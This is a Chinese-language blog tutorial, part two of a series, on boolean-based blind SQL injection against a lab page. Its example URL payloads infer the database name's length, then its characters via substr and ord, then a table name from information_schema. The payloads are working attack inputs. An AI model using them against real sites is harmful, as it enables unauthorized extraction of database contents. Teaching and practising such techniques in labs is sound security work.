SQL注入基础布尔盲注（二）

最新推荐文章于 2024-07-12 07:13:33 发布

hunter_76

最新推荐文章于 2024-07-12 07:13:33 发布

阅读量97

点赞数

分类专栏： SQL篇文章标签：渗透测试 sql

本文链接：https://blog.csdn.net/hunter_76/article/details/120111766

版权

SQL篇专栏收录该内容

3 篇文章 0 订阅

订阅专栏

布尔盲注的经典例子

https://www.ichunqiu.com/battalion?t=1&r=68487

测试语句

判断库名长度

构造SQL判断语句，查看页面返回结果推测哪些SQL判断条件是成立的。

这里假设数据库库名的长度为3。

返回结果分为2种，即yes，和no。

/boolean.php?id=1' and length(database())>=1--+  //页面返回结果为yes
/boolean.php?id=1' and length(database())>=2--+  //页面返回结果为yes
/boolean.php?id=1' and length(database())>=3--+  //页面返回结果为yes
/boolean.php?id=1' and length(database())>=4--+  //页面返回结果为no

这里大于等于4时，结果为no，由此判断出长度为3。

获取数据库名

使用逐字符判断的方式获取数据库库名。数据库库名的范围一般在a~z，0~9之内，可能还有一些特殊字符。

假设数据库库名为sql，且第一个字符是s，第二个字符是q。

/boolean.php?id=1' and substr(database(),1,1)='t'--+    //页面返回结果为no
/boolean.php?id=1' and substr(database(),1,1)='a'--+    //页面返回结果为no
/boolean.php?id=1' and substr(database(),1,1)='s'--+    //页面返回结果为yes
/boolean.php?id=1' and substr(database(),2,1)='q'--+    //页面返回结果为yes
substr(database(),<查询的第n个字符>,1)

还可以使用Ascii码的字符进行查询。

/boolean.php?id=1' and ord(substr(database(),1,1))=115--+

利用substr判断数据库的库名

已知数据库sql的第一个表名是email，判断语句

/boolean.php?id=1' and substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1)='e'--+

hunter_76

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
SQL注入基础布尔盲注（二）

布尔盲注的经典例子https://www.ichunqiu.com/battalion?t=1&r=68487测试语句判断库名长度构造SQL判断语句，查看页面返回结果推测哪些SQL判断条件是成立的。这里假设数据库库名的长度为3。返回结果分为2种，即yes，和no。/boolean.php?id=1' and length(database())>=1--+ //页面返回结果为yes/boolean.php?id=1' and length(databas.
复制链接

扫一扫